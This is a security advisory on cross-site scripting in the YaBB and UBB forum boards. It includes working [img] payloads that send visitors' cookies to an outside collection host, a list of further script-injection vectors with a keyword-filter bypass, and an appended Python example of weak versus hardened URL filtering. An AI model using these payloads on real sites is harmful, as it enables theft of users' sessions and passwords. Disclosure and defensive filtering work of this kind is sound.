COMMAND

YaBB and UBB

SYSTEMS AFFECTED

YaBB v1 Gold/SP 1 and older
UBB 6.2.0 Beta Release 1.0

PROBLEM

In "Obscure^" advisory [http://eyeonsecurity.net/advisories/css_in_yabb_and_ubb.html] :

When a user inserts [IMG]url[/IMG], YaBB changes that text to <img src='url'>. If someone inserts javascript:alert() instead of the url, the javascript code is executed by Internet Explorer or some other web browsers. This allows stealing of cookie data and other interesting things. YaBB has filtered the javascript method, however it does not take into consideration that javascript: can be encoded using standard HTML hex and ASCII encoding. Same with UBB. In UBB I need to encode several strings because they added checking for certain keywords such as cookie. In my example I change javascript: to javascript:

Exploit

Inserting a new topic (or reply) with the following text will send visitor's cookies to Eye on Security. The output is saved to http://eyeonsecurity.net/tools/cookies.txt . Cookies will contain the password in the case of UBB and a session cookie (or encoded password) in YaBB.

-- snap YaBB --
[img]javascript:document.write('<img src=http://eyeonsecurity.net/tools/cookie.plx?cookie='+escape(document.cookie)+'>')[/img].
-- snap YaBB --

-- snap UBB --
[IMG]javascript:document.write('<img%20src=http://eyeonsecurity.net/tools/cookie.plx?cookie='+escape(document.cookie)+'>')[/IMG]
-- snap UBB --

Update
======

Obscure added more ways to circumvent YaBB & UBB :

<body onload="alert()">
<link rel="stylesheet" href="javascript:alert()">
<p style="width: expression(alert())"> (works on IE thanks to dynamic properties, executes immediately.)
<img src="vbscript:alert"> (javascript: is not the only potentially harmful kind of URL)
<a href="about:<script>alert()"> (another one for IE)
<a href=&{location='stealcookie.cgi?'};> (one for Netscape 4, so it doesn't feel left out.)

All the above can be made to steal cookies - filtering the string "document.cookie" does no good whatsoever since one can just as well do "document['coo'+'kie']". I'm sure there are many more holes I missed.

SOLUTION

Check web sites, patch should be out soon :

http://yabb.xnull.com
http://www.infopop.com/products/ubb/
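As an added illustration of the PROBLEM section (example code written for this page, not YaBB's or UBB's own Perl), the following Python rewrites the [img] tag two ways: a blacklist on the literal string "javascript:" of the kind the advisory describes, which an entity-encoded scheme walks straight past, and an allowlist check that decodes entities first and accepts only http/https URLs with a host. The sample posts and the example.com host are constructed.

```python
import html
import re
import urllib.parse

# [img]url[/img] BBCode tag, as used by both boards in the advisory.
IMG_TAG = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)


def weak_img_filter(text):
    """Blacklist filter of the kind the advisory describes (constructed here,
    not the boards' actual code): rejects the literal string 'javascript:'
    and passes everything else straight into the src attribute."""
    def repl(match):
        url = match.group(1)
        if "javascript:" in url.lower():
            return "[blocked]"
        return f"<img src='{url}'>"  # unescaped: a quote in url also breaks out
    return IMG_TAG.sub(repl, text)


def safe_image_url(raw):
    """Allowlist check: decode HTML entities first (the advisory's bypass is an
    entity-encoded scheme), drop whitespace and control characters, then
    require an http or https scheme with a host. Returns None if rejected."""
    url = html.unescape(raw)
    url = "".join(ch for ch in url if ch.isprintable() and not ch.isspace())
    try:
        parts = urllib.parse.urlsplit(url)
    except ValueError:  # e.g. malformed IPv6 bracket in the host part
        return None
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return None
    return url


def hardened_img_filter(text):
    """Rewrites [img] tags via safe_image_url and entity-escapes the result so
    quotes in the URL cannot break out of the src attribute."""
    def repl(match):
        url = safe_image_url(match.group(1))
        if url is None:
            return "[invalid image url removed]"
        return '<img src="%s">' % html.escape(url, quote=True)
    return IMG_TAG.sub(repl, text)


if __name__ == "__main__":
    # Constructed sample posts: a normal image, then the scheme with its first
    # letter written as the HTML entity &#106; (decimal for "j").
    for post in ("[img]http://example.com/a.png[/img]",
                 "[img]&#106;avascript:alert()[/img]"):
        print(weak_img_filter(post), "|", hardened_img_filter(post))
```

The weak filter emits the entity-encoded URL untouched, and the browser decodes it before deciding the scheme; the hardened filter rejects it because the check runs on the decoded form and never on a blacklist.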